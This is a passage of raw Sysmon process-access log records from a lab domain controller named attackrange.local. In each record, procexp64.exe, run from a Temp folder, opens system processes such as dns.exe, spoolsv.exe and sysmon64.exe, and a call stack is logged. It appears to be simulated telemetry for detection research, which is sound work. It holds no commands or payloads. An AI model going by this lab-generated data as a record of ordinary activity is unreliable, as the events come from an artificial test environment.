emp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786144Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786143Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786142Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786141Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786140Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786139Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786138Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786137Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786136Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786135Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786134Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786133Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786132Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786131Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786130Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786129Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786128Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786127Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.471{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|